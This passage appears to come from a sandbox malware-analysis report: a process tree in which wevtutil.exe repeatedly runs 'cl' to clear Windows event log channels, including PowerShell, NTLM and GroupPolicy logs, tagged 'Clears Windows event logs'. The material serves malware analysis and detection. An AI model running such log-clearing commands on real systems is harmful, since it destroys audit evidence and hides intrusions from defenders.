        wevtutil.exe cl "Microsoft-Windows-Diagnosis-Scripted/Admin"
        7⤵
        
        PID:12320
        
        C:\Windows\SysWOW64\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Diagnosis-Scripted/Analytic"
        7⤵
        
        PID:16212
        
        C:\Windows\SysWOW64\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Diagnosis-Scripted/Debug"
        7⤵
        
        PID:12256
        
        C:\Windows\SysWOW64\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Diagnosis-Scripted/Operational"
        7⤵
        
        PID:14948
        
        C:\Windows\SysWOW64\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Diagnosis-ScriptedDiagnosticsProvider/Debug"
        7⤵
        
        PID:12336
        
        C:\Windows\SysWOW64\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Diagnosis-ScriptedDiagnosticsProvider/Operational"
        7⤵
        
        PID:12356
        
        C:\Windows\SysWOW64\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Diagnosis-TaskManager/Debug"
        7⤵
        
        PID:12364
        
        C:\Windows\SysWOW64\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Diagnosis-WDC/Analytic"
        7⤵
        
        PID:12380
        
        C:\Windows\SysWOW64\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Diagnosis-WDI/Debug"
        7⤵
        
        PID:12396
        
        C:\Windows\SysWOW64\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Diagnostics-Networking/Debug"
        7⤵
        
        PID:10072
        
        C:\Windows\SysWOW64\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Diagnostics-Networking/Operational"
        7⤵
        
        PID:10172
        
        C:\Windows\SysWOW64\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Diagnostics-PerfTrack-Counters/Diagnostic"
        7⤵
        
        PID:10120
        
        C:\Windows\SysWOW64\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Diagnostics-PerfTrack/Diagnostic"
        7⤵
        Clears Windows event logs
        
        PID:10344
        
        C:\Windows\SysWOW64\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Diagnostics-Performance/Diagnostic"
        7⤵
        
        PID:12480
        
        C:\Windows\SysWOW64\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Diagnostics-Performance/Diagnostic/Loopback"
        7⤵
        
        PID:10060
        
        C:\Windows\SysWOW64\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Diagnostics-Performance/Operational"
        7⤵
        
        PID:12456
        
        C:\Windows\SysWOW64\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Direct3D10/Analytic"
        7⤵
        
        PID:12388
        
        C:\Windows\SysWOW64\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Direct3D10_1/Analytic"
        7⤵
        
        PID:12440
        
        C:\Windows\SysWOW64\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Direct3D11/Analytic"
        7⤵
        
        PID:12428
        
        C:\Windows\SysWOW64\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Direct3D11/Logging"
        7⤵
        
        PID:12424
        
        C:\Windows\SysWOW64\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Direct3D11/PerfTiming"
        7⤵
        
        PID:12404
        
        C:\Windows\SysWOW64\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-DirectShow-KernelSupport/Performance"
        7⤵
        
        PID:12408
        
        C:\Windows\SysWOW64\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-DirectSound/Debug"
        7⤵
        
        PID:12512
        
        C:\Windows\SysWOW64\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-DirectWrite-FontCache/Tracing"
        7⤵
        
        PID:12492
        
        C:\Windows\SysWOW64\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-DirectWrite/Tracing"
        7⤵
        
        PID:12540
        
        C:\Windows\SysWOW64\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Disk/Operational"
        7⤵
        
        PID:12528
        
        C:\Windows\SysWOW64\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-DiskDiagnostic/Operational"
        7⤵
        
        PID:12536
        
        C:\Windows\SysWOW64\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-DiskDiagnosticDataCollector/Operational"
        7⤵
        
        PID:12560
        
        C:\Windows\SysWOW64\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-DiskDiagnosticResolver/Operational"
        7⤵
        
        PID:12576
        
        C:\Windows\SysWOW64\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-DisplayColorCalibration/Debug"
        7⤵
        
        PID:12580
        
        C:\Windows\SysWOW64\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-DisplayColorCalibration/Operational"
        7⤵
        
        PID:12612
        
        C:\Windows\SysWOW64\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-DisplaySwitch/Diagnostic"
        7⤵
        
        PID:12608
        
        C:\Windows\SysWOW64\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Documents/Performance"
        7⤵
        
        PID:12636
        
        C:\Windows\SysWOW64\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-DriverFrameworks-UserMode/Operational"
        7⤵
        
        PID:12640
        
        C:\Windows\SysWOW64\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-DxgKrnl/Diagnostic"
        7⤵
        
        PID:12652
        
        C:\Windows\SysWOW64\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-DxgKrnl/Performance"
        7⤵
        
        PID:12668
        
        C:\Windows\SysWOW64\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-DxpTaskRingtone/Analytic"
        7⤵
        
        PID:12684
        
        C:\Windows\SysWOW64\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-DxpTaskSyncProvider/Analytic"
        7⤵
        
        PID:12716
        
        C:\Windows\SysWOW64\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-EFS/Debug"
        7⤵
        
        PID:12696
        
        C:\Windows\SysWOW64\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-EapHost/Analytic"
        7⤵
        Clears Windows event logs
        
        PID:12720
        
        C:\Windows\SysWOW64\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-EapHost/Debug"
        7⤵
        
        PID:12728
        
        C:\Windows\SysWOW64\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-EapHost/Operational"
        7⤵
        
        PID:12740
        
        C:\Windows\SysWOW64\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-EaseOfAccess/Diagnostic"
        7⤵
        
        PID:12752
        
        C:\Windows\SysWOW64\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-EventCollector/Debug"
        7⤵
        
        PID:12768
        
        C:\Windows\SysWOW64\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-EventCollector/Operational"
        7⤵
        
        PID:12776
        
        C:\Windows\SysWOW64\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-EventLog-WMIProvider/Debug"
        7⤵
        
        PID:12784
        
        C:\Windows\SysWOW64\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-EventLog/Analytic"
        7⤵
        
        PID:12800
        
        C:\Windows\SysWOW64\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-EventLog/Debug"
        7⤵
        
        PID:17396
        
        C:\Windows\SysWOW64\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-FMS/Analytic"
        7⤵
        
        PID:12812
        
        C:\Windows\SysWOW64\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-FMS/Debug"
        7⤵
        Clears Windows event logs
        
        PID:12828
        
        C:\Windows\SysWOW64\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-FMS/Operational"
        7⤵
        
        PID:12860
        
        C:\Windows\SysWOW64\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-FailoverClustering-Client/Diagnostic"
        7⤵
        
        PID:12852
        
        C:\Windows\SysWOW64\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Fault-Tolerant-Heap/Operational"
        7⤵
        
        PID:12884
        
        C:\Windows\SysWOW64\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Feedback-Service-TriggerProvider"
        7⤵
        
        PID:12864
        
        C:\Windows\SysWOW64\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-FileInfoMinifilter/Operational"
        7⤵
        
        PID:12372
        
        C:\Windows\SysWOW64\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Firewall-CPL/Diagnostic"
        7⤵
        
        PID:12896
        
        C:\Windows\SysWOW64\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Folder Redirection/Operational"
        7⤵
        
        PID:12920
        
        C:\Windows\SysWOW64\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Forwarding/Debug"
        7⤵
        
        PID:12912
        
        C:\Windows\SysWOW64\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Forwarding/Operational"
        7⤵
        
        PID:12916
        
        C:\Windows\SysWOW64\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-GettingStarted/Diagnostic"
        7⤵
        
        PID:13048
        
        C:\Windows\SysWOW64\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-GroupPolicy/Operational"
        7⤵
        
        PID:13068
        
        C:\Windows\SysWOW64\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-HAL/Debug"
        7⤵
        
        PID:12980
        
        C:\Windows\SysWOW64\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-HealthCenter/Debug"
        7⤵
        
        PID:12944
        
        C:\Windows\SysWOW64\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-HealthCenter/Performance"
        7⤵
        
        PID:12972
        
        C:\Windows\SysWOW64\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-HealthCenterCPL/Performance"
        7⤵
        
        PID:12992
        
        C:\Windows\SysWOW64\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Help/Operational"
        7⤵
        
        PID:13032
        
        C:\Windows\SysWOW64\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-HomeGroup Control Panel Performance/Diagnostic"
        7⤵
        
        PID:13044
        
        C:\Windows\SysWOW64\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-HomeGroup Control Panel/Operational"
        7⤵
        
        PID:13060
        
        C:\Windows\SysWOW64\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-HomeGroup Listener Service/Operational"
        7⤵
        
        PID:3100
        
        C:\Windows\SysWOW64\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-HomeGroup Provider Service Performance/Diagnostic"
        7⤵
        
        PID:13080
        
        C:\Windows\SysWOW64\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-HomeGroup Provider Service/Operational"
        7⤵
        
        PID:12956
        
        C:\Windows\SysWOW64\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-HomeGroup-ListenerService"
        7⤵
        
        PID:13052
        
        C:\Windows\SysWOW64\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-HotStart/Diagnostic"
        7⤵
        
        PID:13100
        
        C:\Windows\SysWOW64\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-HttpService/Trace"
        7⤵
        
        PID:13116
        
        C:\Windows\SysWOW64\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-IKE/Operational"
        7⤵
        
        PID:13120
        
        C:\Windows\SysWOW64\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-IKEDBG/Debug"
        7⤵
        
        PID:13112
        
        C:\Windows\SysWOW64\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-IPBusEnum/Tracing"
        7⤵
        
        PID:13140
        
        C:\Windows\SysWOW64\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-IPSEC-SRV/Diagnostic"
        7⤵
        
        PID:13064
        
        C:\Windows\SysWOW64\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-International-RegionalOptionsControlPanel/Operational"
        7⤵
        
        PID:13152
        
        C:\Windows\SysWOW64\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-International/Operational"
        7⤵
        
        PID:13176
        
        C:\Windows\SysWOW64\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Iphlpsvc/Debug"
        7⤵
        
        PID:13192
        
        C:\Windows\SysWOW64\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Iphlpsvc/Operational"
        7⤵
        
        PID:13184
        
        C:\Windows\SysWOW64\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Iphlpsvc/Trace"
        7⤵
        
        PID:13204
        
        C:\Windows\SysWOW64\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Kernel-Acpi/Diagnostic"
        7⤵
        
        PID:13228
        
        C:\Windows\SysWOW64\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Kernel-Boot/Analytic"
        7⤵
        
        PID:13304
        
        C:\Windows\SysWOW64\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Kernel-BootDiagnostics/Diagnostic"
        7⤵
        
        PID:13224
        
        C:\Windows\SysWOW64\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Kernel-Disk/Analytic"
        7⤵
        
        PID:13236
        
        C:\Windows\SysWOW64\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Kernel-EventTracing/Admin"
        7⤵
        
        PID:13292
        
        C:\Windows\SysWOW64\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Kernel-EventTracing/Analytic"
        7⤵
        
        PID:13264
        
        C:\Windows\SysWOW64\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Kernel-File/Analytic"
        7⤵
        
        PID:13268
        
        C:\Windows\SysWOW64\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Kernel-Memory/Analytic"
        7⤵
        Clears Windows event logs
        
        PID:13280
        
        C:\Windows\SysWOW64\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Kernel-Network/Analytic"
        7⤵
        
        PID:13240
        
        C:\Windows\SysWOW64\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Kernel-PnP/Diagnostic"
        7⤵
        
        PID:13328
        
        C:\Windows\SysWOW64\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Kernel-Power/Diagnostic"
        7⤵
        
        PID:13320
        
        C:\Windows\SysWOW64\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Kernel-Power/Thermal-Diagnostic"
        7⤵
        
        PID:13332
        
        C:\Windows\SysWOW64\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Kernel-Power/Thermal-Operational"
        7⤵
        
        PID:13340
        
        C:\Windows\SysWOW64\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Kernel-Prefetch/Diagnostic"
        7⤵
        
        PID:5348
        
        C:\Windows\SysWOW64\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Kernel-Process/Analytic"
        7⤵
        
        PID:13388
        
        C:\Windows\SysWOW64\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Kernel-Processor-Power/Diagnostic"
        7⤵
        
        PID:7080
        
        C:\Windows\SysWOW64\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Kernel-Registry/Analytic"
        7⤵
        
        PID:13376
        
        C:\Windows\SysWOW64\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Kernel-StoreMgr/Analytic"
        7⤵
        
        PID:13380
        
        C:\Windows\SysWOW64\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Kernel-StoreMgr/Operational"
        7⤵
        
        PID:13420
        
        C:\Windows\SysWOW64\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Kernel-WDI/Analytic"
        7⤵
        
        PID:13400
        
        C:\Windows\SysWOW64\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Kernel-WDI/Debug"
        7⤵
        
        PID:13408
        
        C:\Windows\SysWOW64\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Kernel-WDI/Operational"
        7⤵
        Clears Windows event logs
        
        PID:13436
        
        C:\Windows\SysWOW64\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Kernel-WHEA/Errors"
        7⤵
        
        PID:13444
        
        C:\Windows\SysWOW64\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Kernel-WHEA/Operational"
        7⤵
        
        PID:13432
        
        C:\Windows\SysWOW64\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Known Folders API Service"
        7⤵
        
        PID:3448
        
        C:\Windows\SysWOW64\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-L2NA/Diagnostic"
        7⤵
        
        PID:856
        
        C:\Windows\SysWOW64\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-LDAP-Client/Debug"
        7⤵
        
        PID:13476
        
        C:\Windows\SysWOW64\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-LUA-ConsentUI/Diagnostic"
        7⤵
        
        PID:13488
        
        C:\Windows\SysWOW64\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-LanguagePackSetup/Analytic"
        7⤵
        
        PID:13496
        
        C:\Windows\SysWOW64\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-LanguagePackSetup/Debug"
        7⤵
        
        PID:13348
        
        C:\Windows\SysWOW64\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-LanguagePackSetup/Operational"
        7⤵
        
        PID:13520
        
        C:\Windows\SysWOW64\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-MCT/Operational"
        7⤵
        
        PID:13524
        
        C:\Windows\SysWOW64\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-MPS-CLNT/Diagnostic"
        7⤵
        
        PID:11568
        
        C:\Windows\SysWOW64\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-MPS-DRV/Diagnostic"
        7⤵
        
        PID:8980
        
        C:\Windows\SysWOW64\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-MPS-SRV/Diagnostic"
        7⤵
        
        PID:11572
        
        C:\Windows\SysWOW64\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-MSPaint/Admin"
        7⤵
        Clears Windows event logs
        
        PID:11596
        
        C:\Windows\SysWOW64\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-MSPaint/Debug"
        7⤵
        
        PID:11604
        
        C:\Windows\SysWOW64\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-MSPaint/Diagnostic"
        7⤵
        
        PID:11660
        
        C:\Windows\SysWOW64\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-MUI/Admin"
        7⤵
        
        PID:11636
        
        C:\Windows\SysWOW64\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-MUI/Analytic"
        7⤵
        
        PID:11648
        
        C:\Windows\SysWOW64\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-MUI/Debug"
        7⤵
        
        PID:13544
        
        C:\Windows\SysWOW64\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-MUI/Operational"
        7⤵
        
        PID:13548
        
        C:\Windows\SysWOW64\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-MediaFoundation-MFReadWrite/SinkWriter"
        7⤵
        
        PID:13552
        
        C:\Windows\SysWOW64\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-MediaFoundation-MFReadWrite/SourceReader"
        7⤵
        
        PID:3588
        
        C:\Windows\SysWOW64\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-MediaFoundation-MFReadWrite/Transform"
        7⤵
        
        PID:13580
        
        C:\Windows\SysWOW64\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-MediaFoundation-PlayAPI/Analytic"
        7⤵
        
        PID:13596
        
        C:\Windows\SysWOW64\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-MemoryDiagnostics-Results/Debug"
        7⤵
        
        PID:3224
        
        C:\Windows\SysWOW64\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-MobilityCenter/Performance"
        7⤵
        
        PID:13572
        
        C:\Windows\SysWOW64\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-NCSI/Analytic"
        7⤵
        
        PID:13608
        
        C:\Windows\SysWOW64\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-NCSI/Operational"
        7⤵
        
        PID:13660
        
        C:\Windows\SysWOW64\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-NDF-HelperClassDiscovery/Debug"
        7⤵
        Clears Windows event logs
        
        PID:13640
        
        C:\Windows\SysWOW64\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-NDIS-PacketCapture/Diagnostic"
        7⤵
        
        PID:13772
        
        C:\Windows\SysWOW64\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-NDIS/Diagnostic"
        7⤵
        
        PID:10216
        
        C:\Windows\SysWOW64\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-NDIS/Operational"
        7⤵
        
        PID:13664
        
        C:\Windows\SysWOW64\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-NTLM/Operational"
        7⤵
        
        PID:13676
        
        C:\Windows\SysWOW64\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-NWiFi/Diagnostic"
        7⤵
        
        PID:13700
        
        C:\Windows\SysWOW64\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Narrator/Diagnostic"
        7⤵
        
        PID:13724
        
        C:\Windows\SysWOW64\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-NetShell/Performance"
        7⤵
        
        PID:13748
        
        C:\Windows\SysWOW64\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Network-and-Sharing-Center/Diagnostic"
        7⤵
        
        PID:13752
        
        C:\Windows\SysWOW64\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-NetworkAccessProtection/Operational"
        7⤵
        
        PID:2304
        
        C:\Windows\SysWOW64\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-NetworkAccessProtection/WHC"
        7⤵
        
        PID:13780
        
        C:\Windows\SysWOW64\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-NetworkLocationWizard/Operational"
        7⤵
        
        PID:13792
        
        C:\Windows\SysWOW64\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-NetworkProfile/Diagnostic"
        7⤵
        
        PID:13824
        
        C:\Windows\SysWOW64\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-NetworkProfile/Operational"
        7⤵
        
        PID:13816
        
        C:\Windows\SysWOW64\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Networking-Correlation/Diagnostic"
        7⤵
        
        PID:13796
        
        C:\Windows\SysWOW64\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-NlaSvc/Diagnostic"
        7⤵
        
        PID:13760
        
        C:\Windows\SysWOW64\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-NlaSvc/Operational"
        7⤵
        
        PID:13716
        
        C:\Windows\SysWOW64\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-OLEACC/Debug"
        7⤵
        
        PID:13688
        
        C:\Windows\SysWOW64\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-OLEACC/Diagnostic"
        7⤵
        
        PID:13828
        
        C:\Windows\SysWOW64\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-OOBE-Machine/Diagnostic"
        7⤵
        Clears Windows event logs
        
        PID:13860
        
        C:\Windows\SysWOW64\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-OfflineFiles/Analytic"
        7⤵
        
        PID:13888
        
        C:\Windows\SysWOW64\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-OfflineFiles/Debug"
        7⤵
        
        PID:13852
        
        C:\Windows\SysWOW64\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-OfflineFiles/Operational"
        7⤵
        Clears Windows event logs
        
        PID:13896
        
        C:\Windows\SysWOW64\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-OfflineFiles/SyncLog"
        7⤵
        
        PID:13916
        
        C:\Windows\SysWOW64\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-OneX/Diagnostic"
        7⤵
        
        PID:13928
        
        C:\Windows\SysWOW64\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-OobeLdr/Analytic"
        7⤵
        
        PID:13936
        
        C:\Windows\SysWOW64\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-PCI/Diagnostic"
        7⤵
        
        PID:13900
        
        C:\Windows\SysWOW64\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-ParentalControls/Operational"
        7⤵
        
        PID:13984
        
        C:\Windows\SysWOW64\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-PeerToPeerDrtEventProvider/Diagnostic"
        7⤵
        
        PID:13976
        
        C:\Windows\SysWOW64\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-PeopleNearMe/Operational"
        7⤵
        
        PID:13940
        
        C:\Windows\SysWOW64\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-PortableDeviceStatusProvider/Analytic"
        7⤵
        
        PID:13996
        
        C:\Windows\SysWOW64\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-PortableDeviceSyncProvider/Analytic"
        7⤵
        
        PID:14036
        
        C:\Windows\SysWOW64\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-PowerCfg/Diagnostic"
        7⤵
        Power Settings
        
        PID:2272
        
        C:\Windows\SysWOW64\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-PowerCpl/Diagnostic"
        7⤵
        
        PID:14016
        
        C:\Windows\SysWOW64\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-PowerEfficiencyDiagnostics/Diagnostic"
        7⤵
        
        PID:14020
        
        C:\Windows\SysWOW64\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-PowerShell/Analytic"
        7⤵
        
        PID:14040
        
        C:\Windows\SysWOW64\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-PowerShell/Operational"
        7⤵
        
        PID:14128
        
        C:\Windows\SysWOW64\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-PrimaryNetworkIcon/Performance"
        7⤵
        
        PID:14140
        
        C:\Windows\SysWOW64\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-PrintService/Admin"
        7⤵
        
        PID:3476
        
        C:\Windows\SysWOW64\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-PrintService/Debug"
        7⤵
        
        PID:13952
        
        C:\Windows\SysWOW64\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-PrintService/Operational"
        7⤵
        
        PID:14088
        
        C:\Windows\SysWOW64\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Program-Compatibility-Assistant/Debug"
        7⤵
        
        PID:14104
        
        C:\Windows\SysWOW64\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-QoS-Pacer/Diagnostic"
        7⤵
        
        PID:14112
        
        C:\Windows\SysWOW64\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-QoS-qWAVE/Debug"
        7⤵
        
        PID:14144
        
        C:\Windows\SysWOW64\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-RPC-Proxy/Debug"
        7⤵
        
        PID:3920
        
        C:\Windows\SysWOW64\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-RPC/Debug"
        7⤵
        
        PID:14436
        
        C:\Windows\SysWOW64\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-RPC/EEInfo"
        7⤵
        
        PID:14148
        
        C:\Windows\SysWOW64\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-ReadyBoost/Analytic"
        7⤵
        
        PID:14324
        
        C:\Windows\SysWOW64\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-ReadyBoost/Operational"
        7⤵
        
        PID:14228
        
        C:\Windows\SysWOW64\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-ReadyBoostDriver/Analytic"
        7⤵
        
        PID:3844
        
        C:\Windows\SysWOW64\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-ReadyBoostDriver/Operational"
        7⤵
        
        PID:14164
        
        C:\Windows\SysWOW64\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Recovery/Operational"
        7⤵
        
        PID:14180
        
        C:\Windows\SysWOW64\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-ReliabilityAnalysisComponent/Operational"
        7⤵
        
        PID:14192
        
        C:\Windows\SysWOW64\wevtutil.exe
        
